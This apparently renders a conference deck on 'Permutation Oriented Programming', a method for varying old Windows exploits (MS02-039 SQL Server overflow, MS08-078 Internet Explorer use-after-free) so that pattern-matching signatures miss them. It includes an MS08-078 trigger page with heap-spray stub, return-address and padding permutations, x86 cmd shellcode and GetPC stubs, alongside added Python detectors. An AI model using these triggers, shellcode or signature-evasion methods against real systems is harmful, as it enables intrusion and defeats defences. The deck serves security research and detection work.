7. Before starting
0-Day
• 0-day is cool, isn't it? But only if nobody is aware of its existence.
• Once the unknown vulnerability becomes known, the 0-day will expire – since a patch or a mitigation is released (whichever comes first).
• So we can conclude that, once expired (patched or mitigated), a 0-day has no more value. If you do not believe me, you can try to sell a well-known vulnerability to your vulnerability broker.
• Some security solutions fight against 0-day faster than the affected vendor.
Pattern-matching
• This technology is as needed today as it was in the past, but a security solution cannot rely only on it.
• No matter how fast the pattern-matching algorithm is, if a pattern does not match, the conclusion is that there is no vulnerability exploitation.
• No vulnerability exploitation, no protection action… But what if the pattern is wrong?
• How can we guarantee that the pattern which did not match is the correct basis for a protection action? Was the detection really designed to detect the vulnerability?
8. Some concepts
Exploitation
• There are lots of good papers and books describing exploitation techniques, so I recommend looking for them for a better understanding.
• This lecture has no pretension of being a complete reference for this topic.
• The exploitation path described here is the one I decided to follow, and it helped me to understand and apply POP (f.k.a. ENG++) to the vulnerabilities.
• All the definitions are in compliance with:
– Common Vulnerabilities and Exposures.
– Common Vulnerability Scoring System.
– Common Weakness Enumeration.
Vulnerability
• Any vulnerability has a trigger, which leads the vulnerability to a possible and reasonable exploitation.
• For some weakness types the vulnerability allows controlling the flow of the software's execution, executing arbitrary code (shellcode), such as: CWE-119, CWE-120, CWE-134, CWE-190, CWE-196, CWE-367, etc.
• Before executing a shellcode, the exploitation must deal with the vulnerable ecosystem (trigger, return address, etc.), performing memory manipulation on additional entities (such as: offset, register, JUMP/CALL, stack, heap, memory alignment, memory padding, etc.).
10. What is Permutation Oriented Programming?
The scenario
• Remember: "Some security solutions fight against 0-day faster than the affected vendor".
• This protection (mitigation) has a long life, and sometimes the correct protection (patch) is never applied.
• People's hope, and consequently their security strategy, rests on this security model: vulnerability mitigated, no patch…
• But what if an old and well-known vulnerability could be exploited even under this security model?
• According to pattern-matching, any new variant of an old vulnerability exploitation is considered a new vulnerability, because there is no pattern to be matched yet!
The technique
• To circumvent or avoid a pattern-matching technology, there are two options:
– Easier: know how the vulnerability is detected (access to the signature/vaccine).
– Harder: know deeply how to trigger the vulnerability and how to exploit it (access to the vulnerable ecosystem).
• Permutation Oriented Programming:
– Deep analysis of a vulnerability, (re)searching for alternatives.
– Use all the acquired knowledge and alternatives to offer a variety of decision points (variants).
– Intended to change the behavior of exploit developers.
– Use randomness to provide unpredictable payloads, i.e., permutation.
13. POP (pronounced /pŏp/) technique
The truth
• POP technique deals with the vulnerable ecosystem and memory manipulation, rather than shellcode – it is neither a new polymorphic shellcode technique, nor an obfuscation technique.
• POP technique can be applied to work with Rapid7 Metasploit Framework, CORE Impact Pro, Immunity CANVAS Professional, and regular stand-alone proof-of-concepts (freestyle coding).
• POP technique is neither additional entropy for the tools mentioned above, nor an Advanced Evasion Technique (AET). Instead, POP technique can empower both of them.
• POP technique maintains exploitation reliability: even using random decisions, it is able to achieve all exploitation requirements.
The examples
• Server-side vulnerabilities:
– MS02-039: CVE-2002-0649/CWE-120.
– MS02-056: CVE-2002-1123/CWE-120.
• Client-side vulnerabilities:
– MS08-078: CVE-2008-4844/CWE-367.
– MS09-002: CVE-2009-0075/CWE-367.
• Windows 32-bit shellcodes:
– 波動拳: "CMD /k".
– 昇龍拳: "CMD /k set DIRCMD=/b".
• All example modules were ported to work with Rapid7 Metasploit Framework, but there are also client-side examples in HTML and JavaScript.
53–106. memory manipulation vulnerability
Internet Explorer (Data Consumers) – Microsoft® HTML Viewer – MSHTML.DLL (Binding Agent)

Trigger page (one XML data island, two nested data consumers bound to the same field as HTML, plus a heap spray):
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE="JavaScript">function heapSpray()</SCRIPT>

Sequence of binding-agent calls, as the deck builds it up frame by frame:
• Data Consumer #01 (DATASRC/DATAFLD of the outer SPAN) is bound:
– CElement::GetAAdataFld
– CElement::GetAAdataSrc
– CRecordInstance::CRecordInstance
– CCurrentRecordConsumer::Bind
– CCurrentRecordInstance::GetCurrentRecordInstance
– CXfer::CreateBinding
– CElement::GetAAdataFld
– CElement::GetAAdataSrc
– CRecordInstance::AddBinding
– CImplPtrAry::Append
– Result: XML Data Source Object #01 attached to Data Consumer #01.
• Data Consumer #02 (the inner SPAN) is bound through the same chain of calls; result: XML Data Source Object #02 attached to Data Consumer #02.
• The field is transferred into consumer #01:
– CRecordInstance::TransferToDestination
– CXfer::TransferFromSrc
– Data Consumer #01 now holds the bound value as UTF-16LE bytes: 0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
• The binding of consumer #01 is removed and its record instance freed:
– CRecordInstance::RemoveBinding
– _MemFree → HeapFree → RtlFreeHeap → RtlpLowFragHeapFree
– CImplAry::Delete
– CRecordInstance::Detach
• CXfer::TransferFromSrc runs again against the binding that was just freed: the DATASRC slot of XML Data Source Object #02 now reads 0x0a0a0a0a, the first DWORD of the freed record, which the bound value has overwritten.
• With shellcode sprayed into the heap so that 0x0a0a0a0a lands inside it, the stale pointer is loaded into eax, then ecx, and dereferenced; execution continues in the sprayed region.
• Frames 104–106 overlay three labels on the same bytes: Trigger (the leading 0a bytes that the dangling reference consumes), Permutation (the remaining 0a0a0a and the rest of the string, which can vary from run to run), and Exploitation (0x0a0a0a0a → shellcode).
107. MS08-078 Breakpoints
bp mshtml!CElement::GetAAdataFld
bp mshtml!CElement::GetAAdataSrc
bp mshtml!CCurrentRecordConsumer::Bind
bp mshtml!CCurrentRecordInstance::GetCurrentRecordInstance
bp mshtml!CXfer::CreateBinding
bp mshtml!CXfer::TransferFromSrc
bp mshtml!CXfer::Detach
bp mshtml!CRecordInstance::CRecordInstance
bp mshtml!CRecordInstance::AddBinding
bp mshtml!CRecordInstance::TransfertoDestination
bp mshtml!CRecordInstance::RemoveBinding
bp mshtml!CRecordInstance::Detach
bp mshtml!CRecordInstance::~CRecordInstance
bp mshtml!CImplPtrAry::Append
bp mshtml!CImplPtrAry::Delete
bp _MemFree
bp kernel32!HeapFree
bp ntdll!RtlFreeHeap
bp ntdll!RtlpLowFragHeapFree
111. MS02-039 POPed
• SQL Request:
  – CLNT_UCAST_INST (0x04).
• SQL INSTANCENAME:
  – ASCII hex values from 0x01 to 0xff, except: 0x0a, 0x0d, , 0x2f, 0x3a and 0x5c.
  – 24,000 permutations.
• Return address:
  – Uses the “jump to register” technique, in this case the ESP register.
  – There are four (4) new possible return addresses within SQLSORT.DLL (Microsoft SQL Server 2000 SP0/SP1/SP2). There are many more return addresses if you do not mind hardcoding them.
  – Tools: “Findjmp.c” by Ryan Permeh (“Hack Proofing Your Network – Second Edition”, 2002), and “DumpOp.c” by Kostya Kortchinsky (“Macro Reliability in Win32 Exploits” – Black Hat Europe, 2007).
  – 4 permutations.
• JUMP:
  – Unconditional JUMP short, relative, and forward to REL8.
  – There are 115 possible values for REL8.
  – 115 permutations.
• Writable address and memory alignment:
  – There are 26,758 new writable addresses within SQLSORT.DLL (Microsoft SQL Server 2000 SP0/SP1/SP2). There are many more writable addresses if you do not mind hardcoding them.
  – Tools: “IDA Pro 5.0 Freeware” by Hex-Rays, and “OllyDbg 2.01 alpha 2” by Oleh Yuschuk.
  – 26,758 permutations.
• Padding and memory alignment:
  – ASCII hex values from 0x01 to 0xff.
  – The length may vary, depending on JUMP, from 3,048 to 29,210 possibilities.
  – 29,210 permutations.
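The slide's point for a defender is that the INSTANCENAME bytes can be permuted over almost the whole 0x01–0xff range, so a content signature (or a "contains non-printable bytes" heuristic) can be permuted away, while the overlong name that the vulnerability depends on cannot. The following is an added example written for this page, not code from the talk or from any product: it classifies a CLNT_UCAST_INST request by instance-name length. The name-length threshold and the sample packets are constructed for the example.

```python
from dataclasses import dataclass

# SSRP (SQL Server Resolution Service, UDP/1434) request type named on the
# slide: CLNT_UCAST_INST, one 0x04 byte followed by a NUL-terminated
# instance name.
CLNT_UCAST_INST = 0x04

# Threshold used by this example (an assumption for illustration): real
# instance names are short, so anything far longer than a name is treated
# as an overflow attempt no matter which bytes it contains.
INSTANCE_NAME_LIMIT = 16


@dataclass
class SsrpVerdict:
    kind: str               # "not-ssrp-inst", "ok" or "overlong"
    name_len: int = 0
    printable: bool = True  # are all name bytes in 0x20..0x7e?


def inspect_ssrp(payload: bytes, limit: int = INSTANCE_NAME_LIMIT) -> SsrpVerdict:
    """Classify one UDP payload by the invariant the vulnerability needs.

    The decision is the *length* of the instance name, not its content.
    `printable` is reported only to show that a "non-printable bytes"
    heuristic would miss a permutation built from printable bytes alone.
    """
    if not payload or payload[0] != CLNT_UCAST_INST:
        return SsrpVerdict("not-ssrp-inst")
    body = payload[1:]
    end = body.find(b"\x00")
    name = body if end < 0 else body[:end]
    printable = all(0x20 <= b <= 0x7E for b in name)
    kind = "overlong" if len(name) > limit else "ok"
    return SsrpVerdict(kind, len(name), printable)


# Constructed samples (not captures): a normal lookup, an overlong name made
# only of printable bytes, and an overlong name with non-printable bytes.
NORMAL = b"\x04MSSQLSERVER\x00"
OVERLONG_PRINTABLE = b"\x04" + bytes(range(0x41, 0x5B)) * 3 + b"\x00"
OVERLONG_MIXED = b"\x04" + b"A" * 40 + bytes([0x01, 0xFF, 0x7F]) + b"\x00"

if __name__ == "__main__":
    for label, pkt in [("normal", NORMAL),
                       ("printable", OVERLONG_PRINTABLE),
                       ("mixed", OVERLONG_MIXED)]:
        print(label, inspect_ssrp(pkt))
```

Both overlong samples are flagged by the length rule; only the second would be caught by a printable-bytes heuristic, which is the gap the slide's permutation counts are pointing at.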
114. MS08-078 POPed
• CVE-2008-4844: “…crafted XML document containing nested <SPAN> elements”? I do not think so…
• XML Data Island:
  – There are two (2) options: using the Dynamic HTML (DHTML) <XML> element within the HTML document or overloading the HTML <SCRIPT> element.
  – Unfortunately, the HTML <SCRIPT> element is useless.
  – But there are three (3) new alternatives to embed a DSO.
  – 4 permutations.
• XML Data Source Object (DSO):
  – Characters like “<” and “&” are illegal in the <XML> element. To avoid errors the <XML> element content can be defined as CDATA (Unparsed Character Data). But the <XML> element can also be written with “&lt;” instead of “<”.
  – Both <IMG SRC= > and <IMAGE SRC= > elements are useful as an XML DSO.
  – 4 permutations.
• Data Consumer (HTML elements):
  – According to MSDN (“Binding HTML Elements to Data”) there are, at least, fifteen (15) bindable HTML elements available, but only five (5) elements are useful.
  – The HTML element is a key trigger, because it points to a dereferenced XML DSO, but it does not have to be the same HTML element to do so – it can be any mixed HTML element.
  – 25 permutations.
• Return address:
  – Uses the “Heap Spray” technique; in this case the XML DSO handles the return address, and can use the “.NET DLL” technique by Mark Dowd and Alexander Sotirov (“How to Impress Girls with Browser Memory Protection Bypasses” – Black Hat USA, 2008).
  – There are, at least, four (4) new possible return addresses.
  – 4 permutations.
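The slide lists exactly the knobs that defeat a literal signature for this bug: CDATA versus entity-encoded markup, IMG versus IMAGE as the DSO, and any bindable element (not only nested SPANs) as the data consumer. The following is an added example written for this page, not code from the talk or from any product: it canonicalises those presentation choices first and then matches the structure the bug needs (an XML data island referenced by a DATASRC/DATAFLD consumer), plus the UTF-16 host-name trick drawn in the slide-101 diagram. The sample document is constructed; the host names in it are placeholders.

```python
import html
import re
from typing import Dict, List, Tuple

# Regexes run over the *normalised* text; tags and attributes are matched
# case-insensitively, attribute values may be bare or quoted.
CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.DOTALL)
XML_ISLAND_RE = re.compile(r"<xml\b[^>]*?\bid\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)
TAG_RE = re.compile(r"<([a-z][a-z0-9]*)\b([^>]*)>", re.IGNORECASE)
DATASRC_RE = re.compile(r"\bdatasrc\s*=\s*[\"']?#([^\s\"'>]+)", re.IGNORECASE)
DATAFLD_RE = re.compile(r"\bdatafld\s*=", re.IGNORECASE)
IMG_SRC_RE = re.compile(r"<(?:img|image)\b[^>]*?\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)
HOST_RE = re.compile(r"^[a-z][a-z0-9+.-]*://([^/?#]+)", re.IGNORECASE)


def normalize(doc: str) -> str:
    """Unwrap CDATA and decode entities until the text stops changing."""
    prev, cur = None, doc
    while cur != prev:
        prev = cur
        cur = CDATA_RE.sub(r"\1", cur)
        cur = html.unescape(cur)
    return cur


def repeated_byte_chars(host: str) -> List[int]:
    """Code points whose UTF-16 unit has equal high and low bytes (e.g. U+0A0A).

    Held as UTF-16 in memory, a run of such characters becomes one repeated
    byte, which is the 0x0a0a0a0a pattern the slide-101 diagram shows.
    """
    return [ord(ch) for ch in host
            if 0x7F < ord(ch) <= 0xFFFF and (ord(ch) >> 8) == (ord(ch) & 0xFF)]


def analyze(doc: str) -> Dict[str, object]:
    """Report data islands, data consumers bound to them, and spray-like hosts."""
    text = normalize(doc)
    islands = [m.group(1) for m in XML_ISLAND_RE.finditer(text)]
    consumers: List[Tuple[str, str]] = []
    for m in TAG_RE.finditer(text):            # any element, not only SPAN
        tag, attrs = m.group(1).lower(), m.group(2)
        src = DATASRC_RE.search(attrs)
        if src and DATAFLD_RE.search(attrs):
            consumers.append((tag, src.group(1)))
    bound = sorted({i for _, i in consumers if i in islands})
    spray_hosts = []
    for m in IMG_SRC_RE.finditer(text):        # IMG and IMAGE alike
        h = HOST_RE.match(m.group(1))
        if h and repeated_byte_chars(h.group(1)):
            spray_hosts.append(h.group(1))
    return {"islands": islands, "consumers": consumers,
            "bound_islands": bound, "spray_hosts": spray_hosts,
            "suspicious": bool(bound)}


# Constructed sample: the slide's CDATA island and nested SPANs (ID=I) next
# to an entity-encoded island with an IMAGE DSO and a DIV consumer (ID=J).
SAMPLE = (
    "<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.example.invalid>]]></C></X></XML>\n"
    "<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>\n"
    "<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>\n"
    "<XML ID=J><X><C>&lt;IMAGE SRC=http://example.invalid/&gt;</C></X></XML>\n"
    "<DIV DATASRC=#J DATAFLD=C DATAFORMATAS=HTML></DIV>\n"
)

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

A byte signature for `<![CDATA[<IMG` plus two `<SPAN DATASRC` tags fires on the first island only; the structural check fires on both, because the variations the slide counts as permutations are removed before matching.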
115.
116. Shellcode
Regular
shell:
  push 0x00646D63        ; "cmd", 0 (little-endian)
  mov ebx, esp
  push edi
  push edi
  push edi
  xor esi, esi
  push byte 18
  pop ecx
Code by Stephen Fewer (Harmony Security) and part of Metasploit Framework.

Hadoken (波動拳)
shell:
  call shell_set_cmd
  db "CMD /k", 0
shell_set_cmd:
  pop ebx
  push edi
  push edi
  push edi
  xor esi, esi
  push byte 18
  pop ecx
Ideas by sk (SCAN Associates Berhad), and published on Phrack Magazine (issue 62, file 7).
Demonstrated on H2HC 6th Edition (2009).
118. Shellcode
Shoryuken (昇龍拳)
shell:
  call shell_set_cmd
  db "CMD /k set DIRCMD=/b", 0
shell_set_cmd:
  pop ebx
  push edi
  push edi
  push edi
  xor esi, esi
  push byte 18
  pop ecx
Ideas by sk (SCAN Associates Berhad), and published on Phrack Magazine (issue 62, file 7).
Demonstrated on H2HC 6th Edition (2009).

FPU GetPC
fnstenv_getpc PROC
  ; Could be fld1, fldl2t, fldl2e,
  ; fldz, fldlg2 or fldln2.
  fldpi
  fnstenv [esp - 0Ch]
  pop eax
  add byte ptr [eax], 0Ah
assembly:
fnstenv_getpc ENDP
Ideas by Aaron Adams, and published on VULN-DEV (November 18th, 2003).
Demonstrated on H2HC 6th Edition (2009).
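The two shellcode slides show two GetPC shapes and the permutations of each: the FPU stub where fldpi can be swapped for any other fld-constant, and the call/pop stub where a string of any length sits between the call and its target. A detector that matches one exact opcode sequence covers one permutation; matching the class covers all of them. The following is an added example written for this page, not code from the talk, Metasploit or any product: a byte scanner for both classes. The sample buffer is constructed, and the call-displacement limit is an assumption of the example.

```python
import struct
from typing import List, Tuple

# x87 "load constant" opcodes that set the FPU instruction pointer; the
# slide lists these as interchangeable, which is the permutation point.
FPU_LOAD_CONST = {
    0xE8: "fld1", 0xE9: "fldl2t", 0xEA: "fldl2e", 0xEB: "fldpi",
    0xEC: "fldlg2", 0xED: "fldln2", 0xEE: "fldz",
}
FNSTENV_ESP_MINUS_0C = bytes.fromhex("D97424F4")  # fnstenv [esp-0Ch]
CALL_REL32 = 0xE8
MAX_CALL_SKIP = 64  # assumption: strings hidden behind a call/pop are short


def is_pop_r32(b: int) -> bool:
    """pop eax .. pop edi (0x58..0x5F)."""
    return 0x58 <= b <= 0x5F


def find_getpc(buf: bytes) -> List[Tuple[int, str]]:
    """Return (offset, description) for every GetPC stub found in buf.

    Two shapes are covered:
      * FPU: any of the seven fld-constant opcodes, then fnstenv [esp-0Ch],
        then pop r32 (the FPU GetPC on the slide, with all its permutations);
      * call/pop: call rel32 with a small positive displacement whose target
        is pop r32, i.e. data such as the "CMD /k" string tucked between the
        call and its target (the Hadoken/Shoryuken shape on the slide).
    """
    hits: List[Tuple[int, str]] = []
    n = len(buf)
    for i in range(n):
        if (i + 7 <= n and buf[i] == 0xD9 and buf[i + 1] in FPU_LOAD_CONST
                and buf[i + 2:i + 6] == FNSTENV_ESP_MINUS_0C
                and is_pop_r32(buf[i + 6])):
            hits.append((i, "fpu:" + FPU_LOAD_CONST[buf[i + 1]]))
        if i + 5 <= n and buf[i] == CALL_REL32:
            disp = struct.unpack_from("<i", buf, i + 1)[0]
            target = i + 5 + disp
            if 0 < disp <= MAX_CALL_SKIP and target < n and is_pop_r32(buf[target]):
                hits.append((i, "call-pop:skip=%d" % disp))
    return hits


# Constructed sample: padding, the slide's fldpi variant, the call/pop shape
# around "CMD /k", and the fldz permutation of the FPU stub.
SAMPLE = (
    b"\x90\x90"
    + b"\xD9\xEB" + FNSTENV_ESP_MINUS_0C + b"\x58"        # fldpi; fnstenv; pop eax
    + b"\xCC" * 3
    + b"\xE8\x07\x00\x00\x00" + b"CMD /k\x00" + b"\x5B"   # call +7; "CMD /k",0; pop ebx
    + b"\xD9\xEE" + FNSTENV_ESP_MINUS_0C + b"\x5F"        # fldz; fnstenv; pop edi
)

if __name__ == "__main__":
    for off, what in find_getpc(SAMPLE):
        print("0x%04x %s" % (off, what))
```

The scanner is deliberately strict (no gap between the three FPU instructions, only the [esp-0Ch] displacement) so that the class it covers is easy to read off; production detectors relax both and usually confirm with emulation, since short opcode runs like these also occur in benign code.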
120.
121. What demo?
NO DEMONSTRATION
But you can test by yourselves!!!